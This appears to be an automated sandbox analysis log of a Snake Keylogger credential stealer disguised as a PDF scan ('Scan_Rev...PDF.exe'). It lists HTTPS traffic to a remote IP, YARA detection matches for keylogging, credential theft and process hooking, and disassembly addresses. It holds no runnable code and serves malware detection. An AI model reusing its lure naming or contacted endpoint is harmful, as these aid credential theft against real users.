                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, Resources.csLarge array initialization: : array initializer size 688421
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, formCarInventory.csLarge array initialization: formCarInventory: array initializer size 4956
                  Source: initial sampleStatic PE information: Filename: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD6B84 NtQueryInformationProcess,1_2_08CD6B84
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDAB60 NtQueryInformationProcess,1_2_08CDAB60
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F6B84 NtQueryInformationProcess,9_2_087F6B84
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FAB60 NtQueryInformationProcess,9_2_087FAB60
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD19801_2_08CD1980
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD6C291_2_08CD6C29
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDCEE01_2_08CDCEE0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD7EF01_2_08CD7EF0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD12181_2_08CD1218
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD9B401_2_08CD9B40
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDACE81_2_08CDACE8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDCEDB1_2_08CDCEDB
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD9F781_2_08CD9F78
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDD16B1_2_08CDD16B
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDD1701_2_08CDD170
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDA4381_2_08CDA438
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091AB7F81_2_091AB7F8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A61801_2_091A6180
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A38381_2_091A3838
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A40A81_2_091A40A8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A40A31_2_091A40A3
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A3C701_2_091A3C70
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A44DB1_2_091A44DB
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_091A44E01_2_091A44E0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152C1468_2_0152C146
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_015253628_2_01525362
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152D2788_2_0152D278
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152C4688_2_0152C468
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152C7388_2_0152C738
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152E9888_2_0152E988
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_015269A08_2_015269A0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01523B958_2_01523B95
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152CA088_2_0152CA08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01529DE08_2_01529DE0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152CCD88_2_0152CCD8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01526FC88_2_01526FC8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152CFAC8_2_0152CFAC
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01523E098_2_01523E09
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152E97C8_2_0152E97C
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152F9618_2_0152F961
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_015229EC8_2_015229EC
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01523AA18_2_01523AA1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C695488_2_05C69548
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6FC688_2_05C6FC68
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C69C708_2_05C69C70
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C650288_2_05C65028
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6DDF18_2_05C6DDF1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6D9998_2_05C6D999
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6D9A88_2_05C6D9A8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6D5408_2_05C6D540
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6D5508_2_05C6D550
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C629708_2_05C62970
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6D0F88_2_05C6D0F8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6CCA08_2_05C6CCA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C600408_2_05C60040
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6F8028_2_05C6F802
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6F8108_2_05C6F810
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C650188_2_05C65018
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C600388_2_05C60038
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C69BF78_2_05C69BF7
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C68B918_2_05C68B91
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C68BA08_2_05C68BA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C61BA88_2_05C61BA8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6F3A88_2_05C6F3A8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6F3B88_2_05C6F3B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6EF518_2_05C6EF51
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6EF608_2_05C6EF60
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C61B778_2_05C61B77
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6EB088_2_05C6EB08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C60B208_2_05C60B20
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C693288_2_05C69328
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C60B308_2_05C60B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6EAF88_2_05C6EAF8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C622888_2_05C62288
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6E6AF8_2_05C6E6AF
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6E6B08_2_05C6E6B0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6E24A8_2_05C6E24A
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6E2588_2_05C6E258
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C622788_2_05C62278
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C6DE008_2_05C6DE00
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F19809_2_087F1980
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F6C209_2_087F6C20
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F7EF09_2_087F7EF0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FCEE09_2_087FCEE0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F42409_2_087F4240
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F12189_2_087F1218
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FB2DC9_2_087FB2DC
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F9B409_2_087F9B40
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FACE89_2_087FACE8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FCED09_2_087FCED0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F9F789_2_087F9F78
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FD1709_2_087FD170
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FD15F9_2_087FD15F
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087FA4389_2_087FA438
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147C14713_2_0147C147
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147536213_2_01475362
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147D27813_2_0147D278
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147C46813_2_0147C468
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147C73813_2_0147C738
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147E98813_2_0147E988
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_014769A013_2_014769A0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147CA0813_2_0147CA08
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_01479DE013_2_01479DE0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147CCD813_2_0147CCD8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_01476FC813_2_01476FC8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147CFA913_2_0147CFA9
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147F96013_2_0147F960
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_0147E97B13_2_0147E97B
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_014729EC13_2_014729EC
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_01473AA113_2_01473AA1
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_01473E0913_2_01473E09
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D1E8013_2_069D1E80
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D17A013_2_069D17A0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D9C1813_2_069D9C18
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DFC6813_2_069DFC68
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D0B3013_2_069D0B30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D932813_2_069D9328
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D502813_2_069D5028
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D296813_2_069D2968
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DE6B013_2_069DE6B0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DE6A013_2_069DE6A0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DDE0013_2_069DDE00
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D1E7013_2_069D1E70
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D178F13_2_069D178F
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DEF5113_2_069DEF51
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DEF6013_2_069DEF60
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DCCA013_2_069DCCA0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DDDFF13_2_069DDDFF
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD55013_2_069DD550
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D954813_2_069D9548
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD54013_2_069DD540
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DEAF813_2_069DEAF8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DE25813_2_069DE258
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DE24A13_2_069DE24A
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D8B9113_2_069D8B91
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DF3B813_2_069DF3B8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D8BA013_2_069D8BA0
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DEB0813_2_069DEB08
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D0B2013_2_069D0B20
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD0F813_2_069DD0F8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD0E813_2_069DD0E8
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D501813_2_069D5018
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DF81013_2_069DF810
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D000613_2_069D0006
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DF80213_2_069DF802
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D004013_2_069D0040
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD99913_2_069DD999
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069DD9A813_2_069DD9A8
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: invalid certificate
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1468306324.000000000C380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1460284409.00000000034F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879917067.0000000001187000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeBinary or memory string: OriginalFilenameUDRS.exe> vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
